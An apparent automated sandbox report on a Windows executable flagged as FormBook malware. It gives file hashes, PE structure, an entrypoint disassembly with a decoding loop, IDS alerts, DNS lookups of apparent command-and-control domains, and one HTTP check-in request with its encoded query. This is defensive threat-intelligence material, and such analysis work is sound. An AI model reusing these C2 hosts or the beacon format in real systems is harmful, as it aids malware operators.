                                                    • 108.177.127.132
                                                    Order_385647584.xlsxGet hashmaliciousBrowse
                                                    • 34.102.136.180
                                                    rB26M8hfIh.exeGet hashmaliciousBrowse
                                                    • 8.8.8.8
                                                    brewin-Invoice024768-xlsx.HtmlGet hashmaliciousBrowse
                                                    • 216.239.34.21
                                                    WFLPGBTMZH.dllGet hashmaliciousBrowse
                                                    • 108.177.126.132
                                                    PO#218740.exeGet hashmaliciousBrowse
                                                    • 34.98.99.30
                                                    20210111 Virginie.exeGet hashmaliciousBrowse
                                                    • 34.102.136.180
                                                    BODIS-NJUSin.exeGet hashmaliciousBrowse
                                                    • 199.59.242.153
                                                    zHgm9k7WYU.exeGet hashmaliciousBrowse
                                                    • 199.59.242.153
                                                    65BV6gbGFl.exeGet hashmaliciousBrowse
                                                    • 199.59.242.153
                                                    PO85937758859777.xlsxGet hashmaliciousBrowse
                                                    • 199.59.242.153
                                                    PO#218740.exeGet hashmaliciousBrowse
                                                    • 199.59.242.153
                                                    g2fUeYQ7Rh.exeGet hashmaliciousBrowse
                                                    • 199.59.242.153
                                                    c6Rg7xug26.exeGet hashmaliciousBrowse
                                                    • 199.59.242.153
                                                    sample20210111-01.xlsmGet hashmaliciousBrowse
                                                    • 199.59.242.150
                                                    IRS Notice Letter pdf document.exeGet hashmaliciousBrowse
                                                    • 199.59.242.153
                                                    mQFXD5FxGT.exeGet hashmaliciousBrowse
                                                    • 199.59.242.153
                                                    099898892.exeGet hashmaliciousBrowse
                                                    • 199.59.242.153
                                                    ZIPEXT#U007e1.EXEGet hashmaliciousBrowse
                                                    • 199.59.242.153
                                                    990109.exeGet hashmaliciousBrowse
                                                    • 199.59.242.153
                                                    SAWR000148651.exeGet hashmaliciousBrowse
                                                    • 199.59.242.153
                                                    SHIPPING INVOICEpdf.exeGet hashmaliciousBrowse
                                                    • 199.59.242.153
                                                    https://www.chronopost.fr/fclV2/authentification.html?numLt=XP091625009FR&profil=DEST&cc=47591&type=MASMail&lang=fr_FRGet hashmaliciousBrowse
                                                    • 199.59.242.153
                                                    IRS Notice Letter.exeGet hashmaliciousBrowse
                                                    • 199.59.242.153
                                                    IRS Notice Letter.exeGet hashmaliciousBrowse
                                                    • 199.59.242.153
                                                    Payment Order Inv.exeGet hashmaliciousBrowse
                                                    • 199.59.242.153
                                                    h3dFAROdF3.exeGet hashmaliciousBrowse
                                                    • 199.59.242.153
                                                    TEBYANIRhttp://europeanclassiccomic.blogspot.com/2015/10/blueberry.htmlGet hashmaliciousBrowse
                                                    • 185.78.22.41
                                                    PO Order 19082020.exeGet hashmaliciousBrowse
                                                    • 94.232.172.78
                                                    8Request for correction.exeGet hashmaliciousBrowse
                                                    • 185.126.200.167
                                                    6Request for Quotation #2212208 #2.exeGet hashmaliciousBrowse
                                                    • 185.126.200.141
                                                    35Pall enquiry No FC-21565Project Specification.exeGet hashmaliciousBrowse
                                                    • 185.126.200.141
                                                    54packing list.exeGet hashmaliciousBrowse
                                                    • 185.126.200.141
                                                    66$6300USD.exeGet hashmaliciousBrowse
                                                    • 185.126.200.141
                                                    57arik.exeGet hashmaliciousBrowse
                                                    • 185.126.200.141
                                                    27arrriik.exeGet hashmaliciousBrowse
                                                    • 185.126.200.141
                                                    27Halkbank_Ekstre_20181213_115314_79235.exeGet hashmaliciousBrowse
                                                    • 185.126.200.141
                                                    33Specifications of Sample Products.exeGet hashmaliciousBrowse
                                                    • 185.126.200.160
                                                    RFQ KFO-18094,xls.exeGet hashmaliciousBrowse
                                                    • 185.126.200.160
                                                    Payment_Receipt.exeGet hashmaliciousBrowse
                                                    • 185.126.200.160
                                                    malware.docGet hashmaliciousBrowse
                                                    • 185.126.200.160
                                                    malware.docGet hashmaliciousBrowse
                                                    • 185.126.200.160
                                                    malware.docGet hashmaliciousBrowse
                                                    • 185.126.200.160
                                                    malware.docGet hashmaliciousBrowse
                                                    • 185.126.200.160
                                                    malware.docGet hashmaliciousBrowse
                                                    • 185.126.200.160
                                                    malware.docGet hashmaliciousBrowse
                                                    • 185.126.200.160
                                                    68Halkbank_Ekstre_20181130_075314_792357.exeGet hashmaliciousBrowse
                                                    • 185.126.200.134

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    No created / dropped files found

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Entropy (8bit):7.893187300476172
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:74852.exe
                                                    File size:237056
                                                    MD5:e295cb54968cb6f3575a7caf32fe7f5a
                                                    SHA1:84405250603351ebe538e7ae34812704c0c3f480
                                                    SHA256:15198bfd2fbc367f07a22c6b39ea4e658dfea4a51b74cb4a653eb4b936ad3db0
                                                    SHA512:fb5be96870170a769262214bd72a356b6e845328a3838b3ebdb9e8d5f5b8d09c95e992acad00e7c24762d8e351daf6e1810ad44515374f2261f9a3565d857880
                                                    SSDEEP:6144:QKPcYfkbpRxdaS4fKbOdHPHHHn1useoMcxp4j:QLzdaS4fKbOdHPnHxfMcxWj
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........UL...L...L....49.M.....G.\...L...w.......O.......N...kR0.M...kR7.M...kR2.M...RichL...........................PE..L...Y.._...

                                                    File Icon

                                                    Icon Hash:00828e8e8686b000

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x407970
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                    DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                    Time Stamp:0x5FFEA359 [Wed Jan 13 07:38:01 2021 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:6
                                                    OS Version Minor:0
                                                    File Version Major:6
                                                    File Version Minor:0
                                                    Subsystem Version Major:6
                                                    Subsystem Version Minor:0
                                                    Import Hash:13f6eb96e7165e986a0d233796ec15e0

                                                    Entrypoint Preview

                                                    Instruction
                                                    push ebp
                                                    mov ebp, esp
                                                    mov eax, 00001E14h
                                                    call 00007F14ECDD6718h
                                                    push 00409BCCh
                                                    call dword ptr [00408028h]
                                                    mov dword ptr [ebp-0Ch], eax
                                                    call 00007F14ECDD6385h
                                                    push 069A1AD6h
                                                    mov eax, dword ptr [ebp-0Ch]
                                                    push eax
                                                    call 00007F14ECDD6267h
                                                    mov dword ptr [ebp-20h], eax
                                                    push 09C857BEh
                                                    mov ecx, dword ptr [ebp-0Ch]
                                                    push ecx
                                                    call 00007F14ECDD6256h
                                                    mov dword ptr [ebp-10h], eax
                                                    push 93B3503Eh
                                                    mov edx, dword ptr [ebp-0Ch]
                                                    push edx
                                                    call 00007F14ECDD6245h
                                                    mov dword ptr [ebp-14h], eax
                                                    push 0000000Ah
                                                    push 00409BE8h
                                                    push 00000000h
                                                    call dword ptr [ebp-20h]
                                                    mov dword ptr [ebp-18h], eax
                                                    mov eax, dword ptr [ebp-18h]
                                                    push eax
                                                    push 00000000h
                                                    call dword ptr [ebp-10h]
                                                    mov dword ptr [ebp-1Ch], eax
                                                    push 00001A05h
                                                    mov ecx, dword ptr [ebp-1Ch]
                                                    push ecx
                                                    lea edx, dword ptr [ebp-00001E14h]
                                                    push edx
                                                    call 00007F14ECDD6676h
                                                    add esp, 0Ch
                                                    mov dword ptr [ebp-08h], 00000000h
                                                    jmp 00007F14ECDD640Bh
                                                    mov eax, dword ptr [ebp-08h]
                                                    add eax, 01h
                                                    mov dword ptr [ebp-08h], eax
                                                    cmp dword ptr [ebp-08h], 00001A05h
                                                    jnc 00007F14ECDD64D3h
                                                    mov ecx, dword ptr [ebp-08h]
                                                    mov dl, byte ptr [ebp+ecx-00001E14h]
                                                    mov byte ptr [ebp-01h], dl
                                                    movzx eax, byte ptr [ebp-01h]
                                                    xor eax, dword ptr [ebp-08h]
                                                    mov byte ptr [ebp-01h], al
                                                    movzx ecx, byte ptr [ebp-01h]
                                                    add ecx, dword ptr [ebp-08h]
                                                    mov byte ptr [ebp-01h], cl
                                                    movzx eax, byte ptr [eax]

                                                    Rich Headers

                                                    Programming Language:
                                                    • [LNK] VS2012 build 50727
                                                    • [ C ] VS2012 build 50727
                                                    • [LNK] VS98 (6.0) imp/exp build 8168
                                                    • [RES] VS2012 build 50727

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x81340xc8.rdata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x1a78.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xe0000xaac.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x80000x110.rdata
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x10000x6d8a0x6e00False0.425355113636data6.16120389918IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                    .rdata0x80000x6fe0x800False0.4375data4.45062304769IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .data0x90000x22ad0x2400False0.255099826389data4.66400488054IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                    .rsrc0xc0000x1a780x1c00False0.945870535714data7.76084459828IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc0xe0000xb1a0xc00False0.7724609375data6.4424223402IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    NameRVASizeTypeLanguageCountry
                                                    RT_RCDATA0xc0700x1a05dataEnglishUnited States

                                                    Imports

                                                    DLLImport
                                                    MSVCRT.dllmemset, pow, _strtime, _strdate, strlen, strcmp, strcat, strcpy, memcpy, isprint, malloc, exit, scanf, puts, fclose, putchar, printf, fscanf, fprintf, fopen, _strupr
                                                    KERNEL32.dllGetStdHandle, HeapAlloc, ReleaseMutex, SuspendThread, ReadConsoleA, SetConsoleCursorPosition, GetModuleHandleW, GetProcessHeap, GetPrivateProfileSectionNamesW
                                                    SHELL32.dllSHEmptyRecycleBinW
                                                    MAPI32.dll
                                                    WINMM.dllmidiOutGetErrorTextA, midiConnect, midiInStop, waveOutOpen, waveInGetDevCapsW, WOW32DriverCallback
                                                    loadperf.dllLoadPerfCounterTextStringsW, UnloadPerfCounterTextStringsW, UnloadPerfCounterTextStringsA, LoadPerfCounterTextStringsA
                                                    mscms.dllDisassociateColorProfileFromDeviceW, SetColorProfileElementSize, CheckColors, GetPS2ColorRenderingIntent, SetColorProfileHeader, GetCountColorProfileElements, GetStandardColorSpaceProfileW
                                                    COMDLG32.dllChooseFontW, ChooseColorW, ReplaceTextA
                                                    USER32.dllGrayStringW, GetDC

                                                    Possible Origin

                                                    Language of compilation systemCountry where language is spokenMap
                                                    EnglishUnited States

                                                    Network Behavior

                                                    Snort IDS Alerts

                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                    01/13/21-21:22:07.929063ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.78.8.8.8
                                                    01/13/21-21:23:28.224693TCP1201ATTACK-RESPONSES 403 Forbidden804975634.102.136.180192.168.2.7
                                                    01/13/21-21:23:48.503897TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975780192.168.2.735.242.183.249
                                                    01/13/21-21:23:48.503897TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975780192.168.2.735.242.183.249
                                                    01/13/21-21:23:48.503897TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975780192.168.2.735.242.183.249

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jan 13, 2021 21:21:43.258002043 CET4974080192.168.2.7199.59.242.153
                                                    Jan 13, 2021 21:21:43.380745888 CET8049740199.59.242.153192.168.2.7
                                                    Jan 13, 2021 21:21:43.380868912 CET4974080192.168.2.7199.59.242.153
                                                    Jan 13, 2021 21:21:43.380984068 CET4974080192.168.2.7199.59.242.153
                                                    Jan 13, 2021 21:21:43.503632069 CET8049740199.59.242.153192.168.2.7
                                                    Jan 13, 2021 21:21:43.504091978 CET8049740199.59.242.153192.168.2.7
                                                    Jan 13, 2021 21:21:43.504126072 CET8049740199.59.242.153192.168.2.7
                                                    Jan 13, 2021 21:21:43.504148960 CET8049740199.59.242.153192.168.2.7
                                                    Jan 13, 2021 21:21:43.504165888 CET8049740199.59.242.153192.168.2.7
                                                    Jan 13, 2021 21:21:43.504183054 CET8049740199.59.242.153192.168.2.7
                                                    Jan 13, 2021 21:21:43.504203081 CET4974080192.168.2.7199.59.242.153
                                                    Jan 13, 2021 21:21:43.504282951 CET4974080192.168.2.7199.59.242.153
                                                    Jan 13, 2021 21:21:43.504364014 CET4974080192.168.2.7199.59.242.153
                                                    Jan 13, 2021 21:22:24.789391041 CET4975480192.168.2.7185.78.22.74
                                                    Jan 13, 2021 21:22:24.919250011 CET8049754185.78.22.74192.168.2.7
                                                    Jan 13, 2021 21:22:24.919429064 CET4975480192.168.2.7185.78.22.74
                                                    Jan 13, 2021 21:22:24.919759989 CET4975480192.168.2.7185.78.22.74
                                                    Jan 13, 2021 21:22:25.049675941 CET8049754185.78.22.74192.168.2.7
                                                    Jan 13, 2021 21:22:25.049778938 CET8049754185.78.22.74192.168.2.7
                                                    Jan 13, 2021 21:22:25.049798012 CET8049754185.78.22.74192.168.2.7
                                                    Jan 13, 2021 21:22:25.050143003 CET4975480192.168.2.7185.78.22.74
                                                    Jan 13, 2021 21:22:25.050194979 CET4975480192.168.2.7185.78.22.74
                                                    Jan 13, 2021 21:22:25.180115938 CET8049754185.78.22.74192.168.2.7
                                                    Jan 13, 2021 21:22:25.180150032 CET8049754185.78.22.74192.168.2.7
                                                    Jan 13, 2021 21:22:25.180242062 CET4975480192.168.2.7185.78.22.74
                                                    Jan 13, 2021 21:23:28.042525053 CET4975680192.168.2.734.102.136.180
                                                    Jan 13, 2021 21:23:28.082698107 CET804975634.102.136.180192.168.2.7
                                                    Jan 13, 2021 21:23:28.085659981 CET4975680192.168.2.734.102.136.180
                                                    Jan 13, 2021 21:23:28.085913897 CET4975680192.168.2.734.102.136.180
                                                    Jan 13, 2021 21:23:28.126132011 CET804975634.102.136.180192.168.2.7
                                                    Jan 13, 2021 21:23:28.224693060 CET804975634.102.136.180192.168.2.7
                                                    Jan 13, 2021 21:23:28.225006104 CET804975634.102.136.180192.168.2.7
                                                    Jan 13, 2021 21:23:28.225167036 CET4975680192.168.2.734.102.136.180
                                                    Jan 13, 2021 21:23:28.225212097 CET4975680192.168.2.734.102.136.180
                                                    Jan 13, 2021 21:23:28.265228033 CET804975634.102.136.180192.168.2.7

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jan 13, 2021 21:20:34.571810007 CET5871753192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:20:34.622791052 CET53587178.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:20:35.369043112 CET5976253192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:20:35.416857004 CET53597628.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:20:36.507339954 CET5432953192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:20:36.555099010 CET53543298.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:20:38.243972063 CET5805253192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:20:38.292078972 CET53580528.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:20:39.396399975 CET5400853192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:20:39.445344925 CET53540088.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:20:40.266743898 CET5945153192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:20:40.314629078 CET53594518.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:20:42.454840899 CET5291453192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:20:42.502712011 CET53529148.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:20:43.971358061 CET6456953192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:20:44.023819923 CET53645698.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:20:45.228204012 CET5281653192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:20:45.276237011 CET53528168.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:20:46.369461060 CET5078153192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:20:46.417510033 CET53507818.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:20:47.206028938 CET5423053192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:20:47.253808975 CET53542308.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:20:48.439342022 CET5491153192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:20:48.490701914 CET53549118.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:20:49.240423918 CET4995853192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:20:49.288337946 CET53499588.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:20:50.088927984 CET5086053192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:20:50.136868000 CET53508608.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:20:51.007961035 CET5045253192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:20:51.058684111 CET53504528.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:20:52.380373001 CET5973053192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:20:52.431174994 CET53597308.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:20:55.042602062 CET5931053192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:20:55.112732887 CET53593108.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:21:09.003077030 CET5191953192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:21:09.053802967 CET53519198.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:21:19.104757071 CET6429653192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:21:19.165226936 CET53642968.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:21:23.292512894 CET5668053192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:21:23.352874041 CET53566808.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:21:23.455874920 CET5882053192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:21:24.315306902 CET6098353192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:21:24.463956118 CET5882053192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:21:25.322962046 CET6098353192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:21:25.479645014 CET5882053192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:21:25.517379999 CET53588208.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:21:25.612891912 CET4924753192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:21:25.669292927 CET53492478.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:21:26.339009047 CET6098353192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:21:26.398962021 CET53609838.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:21:30.074019909 CET5228653192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:21:30.130373955 CET53522868.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:21:43.092905998 CET5606453192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:21:43.253431082 CET53560648.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:21:43.381735086 CET6374453192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:21:43.437869072 CET53637448.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:21:44.051506042 CET6145753192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:21:44.110639095 CET53614578.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:21:44.761344910 CET5836753192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:21:44.809230089 CET53583678.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:21:45.530606031 CET6059953192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:21:45.586942911 CET53605998.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:21:45.594459057 CET5957153192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:21:45.642530918 CET53595718.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:21:46.257116079 CET5268953192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:21:46.305104017 CET53526898.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:21:47.079885960 CET5029053192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:21:47.127847910 CET53502908.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:21:48.229903936 CET6042753192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:21:48.286302090 CET53604278.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:21:49.453710079 CET5620953192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:21:49.513180971 CET53562098.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:21:50.752135038 CET5958253192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:21:50.808866978 CET53595828.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:21:52.092726946 CET6094953192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:21:52.156522036 CET53609498.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:22:03.717175007 CET5854253192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:22:04.732358932 CET5854253192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:22:05.748018026 CET5854253192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:22:05.943634033 CET5917953192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:22:06.000158072 CET53591798.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:22:06.539079905 CET53585428.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:22:07.928931952 CET53585428.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:22:08.307085037 CET53585428.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:22:09.525789976 CET6092753192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:22:09.576493979 CET53609278.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:22:24.710690022 CET5785453192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:22:24.787173986 CET53578548.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:22:29.421145916 CET6202653192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:22:29.469001055 CET53620268.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:22:45.240956068 CET5945353192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:22:45.303381920 CET53594538.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:23:05.487695932 CET6246853192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:23:05.564940929 CET53624688.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:23:27.971364021 CET5256353192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:23:28.041452885 CET53525638.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:23:48.376846075 CET5472153192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:23:48.443021059 CET53547218.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:24:08.842504978 CET6282653192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:24:08.907586098 CET53628268.8.8.8192.168.2.7

                                                    ICMP Packets

                                                    TimestampSource IPDest IPChecksumCodeType
                                                    Jan 13, 2021 21:22:07.929063082 CET192.168.2.78.8.8.8cff5(Port unreachable)Destination Unreachable

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                    Jan 13, 2021 21:21:43.092905998 CET192.168.2.78.8.8.80x9e51Standard query (0)www.pciappky.comA (IP address)IN (0x0001)
                                                    Jan 13, 2021 21:22:03.717175007 CET192.168.2.78.8.8.80xb3a9Standard query (0)www.baidu4.netA (IP address)IN (0x0001)
                                                    Jan 13, 2021 21:22:04.732358932 CET192.168.2.78.8.8.80xb3a9Standard query (0)www.baidu4.netA (IP address)IN (0x0001)
                                                    Jan 13, 2021 21:22:05.748018026 CET192.168.2.78.8.8.80xb3a9Standard query (0)www.baidu4.netA (IP address)IN (0x0001)
                                                    Jan 13, 2021 21:22:24.710690022 CET192.168.2.78.8.8.80x6c2aStandard query (0)www.borokish.comA (IP address)IN (0x0001)
                                                    Jan 13, 2021 21:22:45.240956068 CET192.168.2.78.8.8.80x54b5Standard query (0)www.memorialinsg.comA (IP address)IN (0x0001)
                                                    Jan 13, 2021 21:23:05.487695932 CET192.168.2.78.8.8.80x6891Standard query (0)www.fishbitedogtreats.comA (IP address)IN (0x0001)
                                                    Jan 13, 2021 21:23:27.971364021 CET192.168.2.78.8.8.80xc9c5Standard query (0)www.wingateofhouston.comA (IP address)IN (0x0001)
                                                    Jan 13, 2021 21:23:48.376846075 CET192.168.2.78.8.8.80xb31fStandard query (0)www.eternylyze.comA (IP address)IN (0x0001)
                                                    Jan 13, 2021 21:24:08.842504978 CET192.168.2.78.8.8.80xb4dStandard query (0)www.ifeelthevoice.comA (IP address)IN (0x0001)

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                    Jan 13, 2021 21:21:43.253431082 CET8.8.8.8192.168.2.70x9e51No error (0)www.pciappky.com199.59.242.153A (IP address)IN (0x0001)
                                                    Jan 13, 2021 21:22:06.539079905 CET8.8.8.8192.168.2.70xb3a9Server failure (2)www.baidu4.netnonenoneA (IP address)IN (0x0001)
                                                    Jan 13, 2021 21:22:07.928931952 CET8.8.8.8192.168.2.70xb3a9Server failure (2)www.baidu4.netnonenoneA (IP address)IN (0x0001)
                                                    Jan 13, 2021 21:22:08.307085037 CET8.8.8.8192.168.2.70xb3a9Server failure (2)www.baidu4.netnonenoneA (IP address)IN (0x0001)
                                                    Jan 13, 2021 21:22:24.787173986 CET8.8.8.8192.168.2.70x6c2aNo error (0)www.borokish.com185.78.22.74A (IP address)IN (0x0001)
                                                    Jan 13, 2021 21:22:45.303381920 CET8.8.8.8192.168.2.70x54b5Name error (3)www.memorialinsg.comnonenoneA (IP address)IN (0x0001)
                                                    Jan 13, 2021 21:23:05.564940929 CET8.8.8.8192.168.2.70x6891Name error (3)www.fishbitedogtreats.comnonenoneA (IP address)IN (0x0001)
                                                    Jan 13, 2021 21:23:28.041452885 CET8.8.8.8192.168.2.70xc9c5No error (0)www.wingateofhouston.comwingateofhouston.comCNAME (Canonical name)IN (0x0001)
                                                    Jan 13, 2021 21:23:28.041452885 CET8.8.8.8192.168.2.70xc9c5No error (0)wingateofhouston.com34.102.136.180A (IP address)IN (0x0001)
                                                    Jan 13, 2021 21:23:48.443021059 CET8.8.8.8192.168.2.70xb31fNo error (0)www.eternylyze.commaster-7rqtwti-vginpjx36tvho.uk-1.platformsh.siteCNAME (Canonical name)IN (0x0001)
                                                    Jan 13, 2021 21:23:48.443021059 CET8.8.8.8192.168.2.70xb31fNo error (0)master-7rqtwti-vginpjx36tvho.uk-1.platformsh.site35.242.183.249A (IP address)IN (0x0001)
                                                    Jan 13, 2021 21:24:08.907586098 CET8.8.8.8192.168.2.70xb4dNo error (0)www.ifeelthevoice.com74.208.236.11A (IP address)IN (0x0001)

                                                    HTTP Request Dependency Graph

                                                    • www.pciappky.com
                                                    • www.borokish.com
                                                    • www.wingateofhouston.com

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    0192.168.2.749740199.59.242.15380C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 13, 2021 21:21:43.380984068 CET7697OUTGET /nf3n/?P6A=BWH4JYaT58lXsf+hwUDxH06dhaR/NFiLUxB8VjbVPAJsYgbKUu72S4XTqnjrUaFuA8KvggDN6w==&-ZS=W6O4IjSXA HTTP/1.1
                                                    Host: www.pciappky.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jan 13, 2021 21:21:43.504091978 CET7699INHTTP/1.1 200 OK
                                                    Server: openresty
                                                    Date: Wed, 13 Jan 2021 20:21:43 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
